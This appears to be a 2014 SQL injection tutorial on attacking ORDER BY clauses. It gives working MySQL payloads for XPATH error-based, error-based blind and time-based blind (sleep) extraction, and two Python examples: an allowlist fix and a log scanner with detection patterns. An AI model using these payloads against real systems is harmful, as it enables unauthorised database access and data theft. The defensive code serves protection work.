Hello, I hope you enjoyed reading our SQL injection tutorials. In this tutorial we will discuss how to inject when the point of injection is an ORDER BY clause or a GROUP BY clause.

First of all, I will start with ORDER BY injection, because injecting into GROUP BY queries is really simple, and a simple UNION-based injection can be used when we are injecting into the ORDER BY clause.

There are three ways of injecting into the ORDER BY clause that we are going to discuss.
1. Error Based Injection
2. Error Based Blind Injection
3. Time Based Blind Techniques.

Exploitation using XPATH injection.

Query:
select posts from content where submit=1 order by $sort
Injection
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))#
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--
input : 1,extractvalue(0x0a,concat(0x0a,(select database())))--+

The above query will output the data in the form of an error. For the rest of the exploitation using XPATH, read XPATH Injection.

select posts from content where submit=1 order by `$sort`
In such cases you will see the column name inside backticks in the query, so just close the backtick first and then inject.
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))#
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--
input : id`,extractvalue(0x0a,concat(0x0a,(select database())))--+
The above query will output the data in the form of an error. For the rest of the exploitation using XPATH, read XPATH Injection.
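Both query shapes above have the same root cause: the $sort value is pasted into the SQL text, and quoting it with backticks does not help because the attacker simply closes the backtick. A column name cannot be bound as a query parameter, so the fix on the application side is an allowlist that maps the client's sort value onto a fixed set of known identifiers. The following is an added example in Python (not code from the original tutorial); it assumes a hypothetical content table and uses an in-memory SQLite database purely to show the query running, the technique is the same for MySQL.

```python
import sqlite3

# Allowlist of sortable columns: the key is what the client may send, the
# value is the trusted identifier that will actually be emitted into SQL.
# Hypothetical schema for this example, not the original page's.
SORTABLE_COLUMNS = {
    "id": "id",
    "date": "created_at",
    "title": "title",
}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(sort_param: str) -> str:
    """Translate an untrusted 'column[:direction]' value into a safe ORDER BY.

    Identifiers cannot be bound as query parameters, so the only safe approach
    is to map the input onto a fixed set of known identifiers. Anything not in
    the map is rejected before it can reach the SQL string.
    """
    column, _, direction = sort_param.partition(":")
    column = column.strip().lower()
    direction = direction.strip().lower() or "asc"
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    if direction not in DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    return f'ORDER BY "{SORTABLE_COLUMNS[column]}" {DIRECTIONS[direction]}'


def fetch_posts(conn, sort_param):
    # The only user-controlled influence on the SQL text is the allowlisted
    # ORDER BY fragment; the WHERE value is bound as a normal parameter.
    sql = "SELECT id, title FROM content WHERE submit = ? " + build_order_by(sort_param)
    return conn.execute(sql, (1,)).fetchall()


def demo():
    """Run a legitimate sort, then show a payload being rejected before the DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE content (id INTEGER, submit INTEGER, title TEXT, created_at TEXT)"
    )
    conn.executemany("INSERT INTO content VALUES (?, ?, ?, ?)", [
        (1, 1, "first", "2014-04-01"),
        (2, 1, "second", "2014-04-02"),
        (3, 0, "hidden", "2014-04-03"),
    ])
    ok = fetch_posts(conn, "date:desc")
    # Payload shape from the tutorial above, used here only as a test input:
    # it never reaches sqlite because build_order_by raises first.
    try:
        fetch_posts(conn, "id`,extractvalue(0x0a,concat(0x0a,(select database())))#")
        rejected = False
    except ValueError:
        rejected = True
    return ok, rejected


if __name__ == "__main__":
    rows, rejected = demo()
    print(rows, "payload rejected:", rejected)
```

The point of the mapping (rather than a regex that "looks safe") is that the string reaching the database is never derived from the request at all; the request only selects which of the hard-coded fragments is used.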

Error Based Blind Injection

This is the case when you cannot see any direct error from the database. In such cases we create the error ourselves, and from the behaviour (no output, or some other kind of error) we can tell that an error occurred. Below is a query I created in such a manner that it will raise an error only when the condition is true; otherwise it will work normally. By looking at the page we will know whether the condition is true or false.
select posts from content where submit=1 order by `$sort`
In such cases you will see the column name inside backticks in the query, so just close the backtick first and then inject.

Injections
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--+
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))--
input : id`,extractvalue(null,concat((select 0 from dual where database() like database()),0x3a))#

Here you can see the condition database() like database(); you can use any condition to test here, and other blind injection syntax will also work. You can use it to extract the database using blind injection.

select posts from content where submit=1 order by `$sort`
Remember that when you try to create an error here it will show an unknown column error; that is no different from the one above which we injected using XPATH, but the same can be done with the injection below, which can be used in cases when the XPATH functions are not available or are disabled.

Injection Syntax

Injections
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--+
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1--
input : id`,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1#

Here you can see the condition 1=1; you can use any condition to test here, and other blind injection syntax will also work. You can use it to extract the database using blind injection.

For the rest of the exploitation you can use Blind Injection.

Exploitation using Time Based Blind Techniques.

Sometimes you could face a condition where true and false show no difference, or the page is redirected somewhere. In such cases it becomes tough to use blind injection. What we will do now is create the query in such a way that it will delay if the condition is true, and reply normally otherwise.
Query:
select posts from content where submit=1 order by `$sort`
Injection
input : id`,(select sleep(10) from dual where database() like database())#
input : id`,(select sleep(10) from dual where database() like database())--
input : id`,(select sleep(10) from dual where database() like database())--+

The above query will reply normally if the condition is false; otherwise it will take time to reply, and this is how we will extract the data. For the rest of the exploitation using time-based blind injection, read Time Based Blind Injection.
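Each of the three techniques in this tutorial leaves a distinct trace in the web server's access log: the XPATH variants carry extractvalue()/updatexml() and produce a 500, the error-based blind variants carry CASE WHEN or information_schema, and the time-based variant carries sleep()/benchmark() together with an abnormally slow response. All of them break out of a column name with a backtick or quote and end in a comment marker. The following is an added detection example in Python (not code from the original tutorial) that scans constructed sample log lines for these markers in the sort parameter; the log format (method, path, status, response time in ms) and the 5 s slow-response threshold are assumptions for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (not from the page): method, path, status, response ms.
# Lines 2, 3 and 5 carry URL-encoded forms of the payload shapes shown above.
SAMPLE_LOG = """\
GET /posts?sort=id 200 12
GET /posts?sort=id%60%2Cextractvalue%280x0a%2Cconcat%280x0a%2C%28select+database%28%29%29%29%29%23 500 15
GET /posts?sort=id%60%2C%28select+sleep%2810%29+from+dual+where+database%28%29+like+database%28%29%29%23 200 10041
GET /posts?sort=title 200 9
GET /posts?sort=id%60%2C%28select+case+when+%281%3D1%29+then+1+else+1*%28select+table_name+from+information_schema.tables%29end%29%3D1--+ 200 11
"""

# Patterns that have no business in a column-name parameter. Each is tied to
# one of the techniques in the tutorial above.
SIGNATURES = {
    "xpath_error": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "conditional": re.compile(r"\bcase\s+when\b|information_schema", re.I),
    "identifier_break": re.compile(r"[`'\"]|--|#|/\*"),
}
SLOW_MS = 5000  # assumed threshold; tune to the endpoint's normal latency


def analyse_line(line, param="sort"):
    """Return the sorted list of signature names that fire for one log line."""
    method, path, status, ms = line.split()
    # parse_qs URL-decodes the values, so %60 becomes a backtick, %23 a '#', etc.
    values = parse_qs(urlsplit(path).query).get(param, [])
    hits = set()
    for value in values:
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(name)
    # A slow response on a request that carries the sort parameter is the
    # observable side effect of the time-based technique.
    if values and int(ms) >= SLOW_MS:
        hits.add("slow_response")
    return sorted(hits)


def scan(log_text):
    """Return (line number, hits) for every line that trips at least one signature."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        hits = analyse_line(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

The identifier_break signature is the most useful one on its own: a legitimate sort parameter is a bare column name, so any quote, backtick or comment marker in it is suspicious regardless of which function follows. Combining it with the slow_response check separates a time-based probe from a merely slow page.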
Author : Zenodermus Javanicus
Date : 2014-04-27